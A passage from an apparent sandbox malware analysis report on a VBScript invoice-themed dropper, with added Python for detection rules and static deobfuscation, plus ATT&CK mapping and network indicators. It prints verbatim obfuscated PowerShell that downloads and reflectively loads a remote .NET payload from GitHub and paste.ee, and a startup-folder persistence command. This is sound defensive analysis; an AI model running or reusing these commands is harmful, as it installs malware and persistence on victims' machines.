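              r"'C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.edadicom.vbs')"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\PING.EXE", "ping 127.0.0.1 -n 10"),
    ProcEvent(r"C:\Windows\System32\wscript.exe", PS,
              "powershell.exe -command $Codigo = 'QUJD';$OWjuxd = [system.Text.encoding]::UTF8.GetString("
              "[system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden "
              "-executionpolicy bypass -NoProfile -command $OWjuxD"),
    # a short ping to a real host, which the sleep rule must not flag
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\PING.EXE", "ping 10.0.0.5 -n 2"),
]


if __name__ == "__main__":
    for idx, names in triage(SAMPLE_EVENTS).items():
        print(idx, _name(SAMPLE_EVENTS[idx].image), names or "-")
```

Each rule is weak on its own (ping -n 10 is also used by administrators' batch files); the value is in the chain, so a real detection would correlate the four hits by process-tree lineage within a short window rather than alert on any single one.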

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\FAKTURA-pdf-466366332.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.edadicom.vbs')')
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\FAKTURA-pdf-466366332.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.edadicom.vbs')')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'0'+'}'+'ur'+'l'+' = {2}https:'+'//raw.gith'+'ub'+'u'+'serc'+'on'+'t'+'ent.com/NoDetect'+'On'+'/N'+'o'+'D'+'etectOn/refs'+'/h'+'eads/mai'+'n/Det'+'ah'+'No'+'th-V.txt'+'{'+'2};'+' {0}'+'ba'+'se64'+'Conte'+'nt'+' '+'= (New-'+'Ob'+'jec'+'t Sy'+'stem.Ne'+'t.W'+'e'+'bCli'+'ent).D'+'ownloadStr'+'i'+'n'+'g({0}'+'url);'+' '+'{'+'0'+'}bin'+'aryCo'+'nte'+'n'+'t '+'= '+'[Sys'+'tem'+'.'+'C'+'onver'+'t]'+':'+':'+'Fr'+'omBas'+'e64St'+'r'+'ing'+'({0}b'+'as'+'e64C'+'o'+'n'+'ten'+'t); {0}as'+'sembly = '+'['+'Refl'+'ection.As'+'s'+'embly'+']::L'+'oad({'+'0'+'}'+'binaryCo'+'nt'+'en'+'t); [dnlib'+'.I'+'O.Home]'+'::VA'+'I('+'{1'+'}'+'0/CVfjD'+'/'+'d/ee.etsa'+'p'+'/'+'/:'+'spt'+'t'+'h'+'{1}, {'+'1'+'}de'+'sati'+'v'+'ado{1}'+', '+'{'+'1}desativ'+'ado{'+'1}'+','+' '+'{1}'+'desa'+'tiv'+'ado{1}, {1'+'}MSBui'+'l'+'d{1}, '+'{1'+'}{1},'+'{1}{1}'+')') -f [chaR]36,[chaR]34,[chaR]39)|&( ([STring]$vERbOsepRefeRencE)[1,3]+'x'-JoIn'')"
Source: C:\Windows\System32\wscript.exe | Process created (lower-cased rendering of the first entry, with the Base64 payload as the report shows it): "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgneycrjzankyd9jysndxinkydsjysnid0gezj9ahr0chm6jysnly9yyxcuz2l0accrj3vijysndscrj3nlcmmnkydvbicrj3qnkydlbnquy29tl05vrgv0zwn0jysnt24nkycvticrj28nkydejysnzxrly3rpbi9yzwzzjysnl2gnkydlywrzl21hascrj24vrgv0jysnywgnkydobycrj3rolvyudhh0jysneycrjzj9oycrjyb7mh0nkydiyscrj3nlnjqnkyddb250zscrj250jysniccrjz0gke5ldy0nkydpyicrj2plyycrj3qgu3knkydzdgvtlk5ljysndc5xjysnzscrj2jdbgknkydlbnqplkqnkydvd25sb2fku3ryjysnascrj24nkydnkhswfscrj3vybck7jysniccrj3snkycwjysnfwjpbicrj2fyeunvjysnbnrljysnbicrj3qgjysnpsankydbu3lzjysndgvtjysnlicrj0mnkydvbnzlcicrj3rdjysnoicrjzonkydgcicrj29tqmfzjysnzty0u3qnkydyjysnaw5njysnkhswfwinkydhcycrj2u2nemnkydvjysnbicrj3rlbicrj3qpoyb7mh1hcycrj3nlbwjsesa9iccrj1snkydszwzsjysnzwn0aw9ulkfzjysncycrj2vtymx5jysnxto6tccrj29hzch7jysnmccrj30nkydiaw5hcnldbycrj250jysnzw4nkyd0ktsgw2rubglijysnlkknkydplkhvbwvdjysnojpwqscrj0kojysnezenkyd9jysnmc9dvmzqrccrjy8nkydkl2vllmv0c2enkydwjysnlycrjy86jysnc3b0jysndccrj2gnkyd7mx0sihsnkycxjysnfwrljysnc2f0ascrj3ynkydhzg97mx0nkycsiccrj3snkycxfwrlc2f0axynkydhzg97jysnmx0nkycsjysniccrj3sxfscrj2rlc2enkyd0axynkydhzg97mx0sihsxjysnfu1tqnvpjysnbccrj2r7mx0siccrj3sxjysnfxsxfswnkyd7mx17mx0nkycpjykglwygiftjagfsxtm2lftjagfsxtm0lftjagfsxtm5kxwmkcaow1nucmluz10kdkvsyk9zzxbszwzlumvuy0upwzesm10rj3gnlupvsw4njyk=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
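The launcher recorded above (wscript.exe to powershell.exe to powershell.exe) hides its script behind three layers: a Base64 blob in $Codigo that [System.Convert]::FromBase64String turns back into UTF-8 PowerShell source; a string-concatenation plus -f format-operator construct in which [char]36, [char]34 and [char]39 stand in for $, " and ' so that none of those characters appear in the command line; and a cmdlet name assembled from ([string]$VerbosePreference)[1,3]+'x', which with the default value SilentlyContinue yields i, e, x. The paste.ee URL handed to [dnlib.IO.Home]::VAI is additionally stored reversed. The following Python is an added example, not part of the report or of the sample; it undoes those layers statically for the recorded command line without executing anything. It assumes $VerbosePreference still has its default value and that the -f arguments are plain [char]N literals, which is what this command uses.

```python
"""Static deobfuscation of the two-stage PowerShell launcher recorded in this report."""
import base64
import re
from typing import Optional

# Second-stage command line copied verbatim from the report's process-creation entry
# (powershell.exe -> powershell.exe). It is only parsed here, never executed.
OBFUSCATED_COMMAND = r"""(('{'+'0'+'}'+'ur'+'l'+' = {2}https:'+'//raw.gith'+'ub'+'u'+'serc'+'on'+'t'+'ent.com/NoDetect'+'On'+'/N'+'o'+'D'+'etectOn/refs'+'/h'+'eads/mai'+'n/Det'+'ah'+'No'+'th-V.txt'+'{'+'2};'+' {0}'+'ba'+'se64'+'Conte'+'nt'+' '+'= (New-'+'Ob'+'jec'+'t Sy'+'stem.Ne'+'t.W'+'e'+'bCli'+'ent).D'+'ownloadStr'+'i'+'n'+'g({0}'+'url);'+' '+'{'+'0'+'}bin'+'aryCo'+'nte'+'n'+'t '+'= '+'[Sys'+'tem'+'.'+'C'+'onver'+'t]'+':'+':'+'Fr'+'omBas'+'e64St'+'r'+'ing'+'({0}b'+'as'+'e64C'+'o'+'n'+'ten'+'t); {0}as'+'sembly = '+'['+'Refl'+'ection.As'+'s'+'embly'+']::L'+'oad({'+'0'+'}'+'binaryCo'+'nt'+'en'+'t); [dnlib'+'.I'+'O.Home]'+'::VA'+'I('+'{1'+'}'+'0/CVfjD'+'/'+'d/ee.etsa'+'p'+'/'+'/:'+'spt'+'t'+'h'+'{1}, {'+'1'+'}de'+'sati'+'v'+'ado{1}'+', '+'{'+'1}desativ'+'ado{'+'1}'+','+' '+'{1}'+'desa'+'tiv'+'ado{1}, {1'+'}MSBui'+'l'+'d{1}, '+'{1'+'}{1},'+'{1}{1}'+')') -f [chaR]36,[chaR]34,[chaR]39)|&( ([STring]$vERbOsepRefeRencE)[1,3]+'x'-JoIn'')"""


def unwrap_stage1(cmdline: str) -> str:
    """Stage 1: $Codigo = '<base64>' holds UTF-8 PowerShell source that the first
    powershell.exe decodes and hands to a second one. Return that inner source, or
    the command line unchanged when the wrapper is absent."""
    m = re.search(r"\$codigo\s*=\s*'([A-Za-z0-9+/=]+)'", cmdline, re.I)
    return base64.b64decode(m.group(1)).decode("utf-8") if m else cmdline


def resolve_concatenation(cmd: str):
    """Stage 2a: join the ('a'+'b'+...) pieces and collect the -f [char]N arguments."""
    m = re.search(r"\(\((.*?)\)\s*-f\s*((?:\[char\]\d+,?)+)", cmd, re.I | re.S)
    if not m:
        raise ValueError("no ('...'+'...') -f [char]N construct found")
    pieces = re.findall(r"'([^']*)'", m.group(1))
    chars = [chr(int(n)) for n in re.findall(r"\[char\](\d+)", m.group(2), re.I)]
    return "".join(pieces), chars


def apply_format_operator(fmt: str, args) -> str:
    """Stage 2b: emulate PowerShell's -f for plain {N} placeholders ({0}=$, {1}=\", {2}=' here)."""
    return re.sub(r"\{(\d+)\}", lambda m: args[int(m.group(1))], fmt)


def resolve_invoker(cmd: str, verbose_preference: str = "SilentlyContinue") -> Optional[str]:
    """Stage 2c: ([string]$VerbosePreference)[i,j]+'x' -join '' names the cmdlet the
    script is piped into. Assumes the variable still holds its default value."""
    m = re.search(r"\$verbosepreference\)\[(\d+),(\d+)\]\+'([^']*)'\s*-join\s*''", cmd, re.I)
    if not m:
        return None
    return verbose_preference[int(m.group(1))] + verbose_preference[int(m.group(2))] + m.group(3)


def reversed_urls(script: str) -> dict:
    """Double-quoted literals that become URLs when read backwards."""
    return {lit: lit[::-1] for lit in re.findall(r'"([^"]*)"', script)
            if lit[::-1].startswith(("http://", "https://"))}


def deobfuscate(cmdline: str) -> dict:
    """Full chain: unwrap stage 1 if present, then resolve the stage-2 obfuscation."""
    stage2 = unwrap_stage1(cmdline)
    fmt, args = resolve_concatenation(stage2)
    script = apply_format_operator(fmt, args)
    rev = reversed_urls(script)
    plain = set(re.findall(r"""https?://[^\s'"]+""", script))
    return {"script": script, "invoker": resolve_invoker(stage2),
            "reversed_urls": rev, "urls": sorted(plain | set(rev.values()))}


if __name__ == "__main__":
    result = deobfuscate(OBFUSCATED_COMMAND)
    print("piped into:", result["invoker"])
    print(result["script"])
    print("network indicators:", result["urls"])
```

The recovered script downloads DetahNoth-V.txt from raw.githubusercontent.com, Base64-decodes it, loads the result as a .NET assembly with [Reflection.Assembly]::Load and calls [dnlib.IO.Home]::VAI with the paste.ee URL (reversed in the command line), three "desativado" arguments, "MSBuild" and two empty strings, which matches the paste.ee and raw.githubusercontent.com connections the report lists. The $Codigo blob itself cannot be recovered from the lower-cased copy of the command line the report also shows, because Base64 is case-sensitive; the original-case entry is needed for stage 1.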
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
MITRE ATT&CK matrix (bracketed numbers are the counts the report attaches to matched techniques; cells without a number are the matrix's default entries):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Scripting [221] | Valid Accounts | Windows Management Instrumentation [2] | Scripting [221] | Process Injection [11] | Virtualization/Sandbox Evasion [31] | OS Credential Dumping | Security Software Discovery [11] | Remote Services | Archive Collected Data [1] | Web Service [1] | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Command and Scripting Interpreter [11] | DLL Side-Loading [1] | DLL Side-Loading [1] | Process Injection [11] | LSASS Memory | Process Discovery [1] | Remote Desktop Protocol | Data from Removable Media | Encrypted Channel [11] | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | Exploitation for Client Execution [1] | Logon Script (Windows) | Logon Script (Windows) | Deobfuscate/Decode Files or Information [1] | Security Account Manager | Virtualization/Sandbox Evasion [31] | SMB/Windows Admin Shares | Data from Network Shared Drive | Ingress Tool Transfer [1] | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | PowerShell [3] | Login Hook | Login Hook | Obfuscated Files or Information [2] | NTDS | Application Window Discovery [1] | Distributed Component Object Model | Input Capture | Non-Application Layer Protocol [2] | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Software Packing [1] | LSA Secrets | Remote System Discovery [1] | SSH | Keylogging | Application Layer Protocol [3] | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | DLL Side-Loading [1] | Cached Domain Credentials | System Network Configuration Discovery [1] | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | File and Directory Discovery [2] | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | System Information Discovery [32] | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
Behavior Graph (ID: 1525548, sample: FAKTURA-pdf-466366332.vbs, start date: 04/10/2024, architecture: WINDOWS, score: 100)

Sample-level signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 8 other signatures
Network: paste.ee, 188.114.96.3, 443, 49709, CLOUDFLARENETUS, European Union (Connects to a pastebin service (likely for C&C)); raw.githubusercontent.com, 185.199.108.133, 443, 49707, FASTLYUS, Netherlands

Process tree:
wscript.exe [VBScript performs obfuscated calls to suspicious functions; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 3 other signatures]
    cmd.exe [Wscript starts Powershell (via cmd or directly); Uses ping.exe to sleep; Uses ping.exe to check the status of other devices and networks]
        powershell.exe [Suspicious powershell command line found; Obfuscated command line found; Found suspicious powershell code related to unpacking or dynamic code loading]
        PING.EXE -> 127.0.0.1 (unknown)
        conhost.exe
    powershell.exe [Suspicious powershell command line found; Obfuscated command line found]
        powershell.exe -> paste.ee (188.114.96.3:443); raw.githubusercontent.com (185.199.108.133:443)
        conhost.exe

Source | Detection | Scanner | Label
--- | --- | --- | ---
FAKTURA-pdf-466366332.vbs | 10% | Virustotal |
FAKTURA-pdf-466366332.vbs | 5% | ReversingLabs | Win32.Trojan.Generic
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
--- | --- | --- | ---
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
http://crl.microsoft | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://aka.ms/pscore6 | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
https://oneget.orgX | 0% | URL Reputation | safe
https://aka.ms/pscore68 | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://oneget.org | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
--- | --- | --- | --- | --- | ---
paste.ee | 188.114.96.3 | true | true | | unknown
raw.githubusercontent.com | 185.199.108.133 | true | false | | unknown

Name | Malicious | Antivirus Detection | Reputation
--- | --- | --- | ---
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt | false | | unknown
https://paste.ee/d/DjfVC/0 | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
--- | --- | --- | --- | ---
https://www.cloudflare.com/learning/access-management/phishing-attack/ | powershell.exe, 00000008.00000002.1667066849.000001B9C8334000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1667066849.000001B9C8359000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000008.00000002.1698437670.000001B9D7E92000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1667066849.000001B9C98A8000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0 | powershell.exe, 00000008.00000002.1667066849.000001B9C953C000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000008.00000002.1667066849.000001B9C975C000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://paste.ee | powershell.exe, 00000008.00000002.1667066849.000001B9C826E000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://crl.microsoft | powershell.exe, 00000008.00000002.1732092735.000001B9DFFF0000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000008.00000002.1667066849.000001B9C975C000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://go.micro | powershell.exe, 00000008.00000002.1667066849.000001B9C90BD000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 00000008.00000002.1667066849.000001B9C98A8000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000008.00000002.1667066849.000001B9C98A8000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://raw.githubusercont | powershell.exe, 00000008.00000002.1667066849.000001B9C94EE000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://paste.ee | powershell.exe, 00000008.00000002.1667066849.000001B9C826E000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://aka.ms/pscore6 | powershell.exe, 00000005.00000002.1609296916.000002641E67B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000008.00000002.1667066849.000001B9C975C000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://www.cloudflare.com/5xx-error-landing | powershell.exe, 00000008.00000002.1667066849.000001B9C8215000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1667066849.000001B9C8334000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1667066849.000001B9C8359000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1667066849.000001B9C8349000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://crl.m | powershell.exe, 00000008.00000002.1730333035.000001B9DFE59000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://raw.githubusercontent.com | powershell.exe, 00000008.00000002.1667066849.000001B9C90BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1667066849.000001B9C8043000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://contoso.com/ | powershell.exe, 00000008.00000002.1667066849.000001B9C98A8000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000008.00000002.1698437670.000001B9D7E92000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1667066849.000001B9C98A8000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://raw.githubusercontent.com | powershell.exe, 00000008.00000002.1667066849.000001B9C94F3000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://oneget.orgX | powershell.exe, 00000008.00000002.1667066849.000001B9C953C000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000005.00000002.1609296916.000002641E699000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1748319451.0000024F8005E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1748319451.0000024F80027000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1667066849.000001B9C7E21000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000005.00000002.1609296916.000002641E6CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1748319451.0000024F80085000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1667066849.000001B9C7E21000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://oneget.org | powershell.exe, 00000008.00000002.1667066849.000001B9C953C000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
--- | --- | --- | --- | --- | ---
188.114.96.3 | paste.ee | European Union | 13335 | CLOUDFLARENETUS | true
185.199.108.133 | raw.githubusercontent.com | Netherlands | 54113 | FASTLYUS | false
                                IP
                                127.0.0.1
                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1525548
                                Start date and time:2024-10-04 11:24:03 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 5m 55s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:15
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:FAKTURA-pdf-466366332.vbs
                                Detection:MAL
                                Classification:mal100.troj.expl.evad.winVBS@13/7@2/3
                                EGA Information:Failed
                                HCA Information:
                                • Successful, ratio: 100%
                                • Number of executed functions: 14
                                • Number of non-executed functions: 1
                                Cookbook Comments:
                                • Found application associated with file extension: .vbs
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                • Excluded IPs from analysis (whitelisted): 4.245.163.56, 88.221.110.91, 2.16.100.168, 40.69.42.241, 13.95.31.18
                                • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                • Execution Graph export aborted for target powershell.exe, PID 4832 because it is empty
                                • Execution Graph export aborted for target powershell.exe, PID 4844 because it is empty
                                • Execution Graph export aborted for target powershell.exe, PID 5944 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
--- | --- | ---
05:25:19 | API Interceptor | 39x Sleep call for process: powershell.exe modified
Match: 188.114.96.3

Associated Sample Name / URL | Detection | Threat Name | Context
--- | --- | --- | ---
QUOTATION_OCTQTRA071244PDF.scr.exe | malicious | Unknown | filetransfer.io/data-package/eZFzMENr/download
1tstvk3Sls.exe | malicious | RHADAMANTHYS | microsoft-rage.world/Api/v3/qjqzqiiqayjq
http://Asm.alcateia.org | malicious | HTMLPhisher | asm.alcateia.org/
hbwebdownload - MT 103.exe | malicious | FormBook | www.j88.travel/c24t/?Edg8Tp=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+lW3g3vOrk23&iL30=-ZRd9JBXfLe8q2J
z4Shipping_document_pdf.exe | malicious | FormBook | www.bayarcepat19.click/g48c/
update SOA.exe | malicious | FormBook | www.bayarcepat19.click/5hcm/
docs.exe | malicious | FormBook | www.j88.travel/c24t/?I6=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+la3znjNy02hfQbCEg==&AL0=9rN46F
https://wwvmicrosx.live/office365/office_cookies/main | malicious | HTMLPhisher | wwvmicrosx.live/office365/office_cookies/main/
http://fitur-dana-terbaru-2024.pages.dev/ | malicious | HTMLPhisher | fitur-dana-terbaru-2024.pages.dev/favicon.ico
http://mobilelegendsmycode.com/ | malicious | Unknown | mobilelegendsmycode.com/favicon.ico

Match: 185.199.108.133

Associated Sample Name / URL | Detection | Threat Name | Context
--- | --- | --- | ---
Purchase Order - PO14895.vbs | malicious | Remcos |
http://www.freemangas.com | malicious | Unknown |
SHIPPING_DOCUMENTS.VBS.vbs | malicious | FormBook |
NhtSITq9Zp.vbs | malicious | Remcos |
risTLdc664.vbs | malicious | FormBook |
uLfuBVyZFV.vbs | malicious | Unknown |
iJEK0xwucj.vbs | malicious | Unknown |
mitec_purchase_order_PDF (1).vbs | malicious | PXRECVOWEIWOEI Stealer |
http://detection.fyi | malicious | NetSupport RAT, Lsass Dumper, Mimikatz, Nukesped, Quasar, Trickbot, Xmrig |
asegura.vbs | malicious | Remcos |
Match: raw.githubusercontent.com

Associated Sample Name / URL | Detection | Threat Name | Context
--- | --- | --- | ---
PDFDQ_P01_303B9367_2024-10-03_185650.vbs | malicious | Remcos | 185.199.109.133
CxVokk1Xp2.rtf | malicious | Remcos | 185.199.110.133
UfsYHroDY1.rtf | malicious | FormBook | 185.199.110.133
8cpJOWLf79.rtf | malicious | Remcos | 185.199.110.133
A&CMetrology_10002099678.xls | malicious | Remcos | 185.199.109.133
Airwaybill#0587340231024.xla.xlsx | malicious | FormBook | 185.199.110.133
Purchase Order - PO14895.vbs | malicious | Remcos | 185.199.108.133
https://www.diamondsbyeden.com/ | malicious | Unknown | 185.199.111.133
https://www.diamondsbyeden.com/ | malicious | Unknown | 185.199.111.133
http://fpnc.vnvrff.com/ | malicious | Unknown | 185.199.111.133

Match: paste.ee

Associated Sample Name / URL | Detection | Threat Name | Context
--- | --- | --- | ---
PDFDQ_P01_303B9367_2024-10-03_185650.vbs | malicious | Remcos | 188.114.96.3
SKMBT_77122012816310TD0128_17311_XLS.vbs | malicious | Remcos | 188.114.97.3
Purchase Order - PO14895.vbs | malicious | Remcos | 188.114.96.3
sostener.vbs | malicious | Njrat | 188.114.97.3
sostener.vbs | malicious | XWorm | 188.114.96.3
NhtSITq9Zp.vbs | malicious | Remcos | 188.114.96.3
risTLdc664.vbs | malicious | FormBook | 188.114.97.3
NTiwJrX4R4.vbs | malicious | Remcos, PureLog Stealer | 188.114.97.3
o45q0zbdwt.vbs | malicious | PureLog Stealer | 188.114.97.3
OIQ1ybtQdW.vbs | malicious | Remcos, PureLog Stealer | 188.114.96.3
Match: CLOUDFLARENETUS

Associated Sample Name / URL | Detection | Threat Name | Context
--- | --- | --- | ---
QUOTATION_OCTQTRA071244PDF.scr.exe | malicious | Unknown | 188.114.96.3
QUOTATION_OCTQTRA071244#U00faPDF.scr.exe | malicious | Snake Keylogger | 188.114.96.3
Payment Advice Note.exe | malicious | GuLoader, Snake Keylogger | 172.67.177.134
Transfer.lnk | malicious | HTMLPhisher | 188.114.96.3
Pago1032024.lnk | malicious | Unknown | 188.114.97.3
https://iasitvlife.ro | malicious | Unknown | 104.17.25.14
Transfer.lnk | malicious | HTMLPhisher | 188.114.97.3
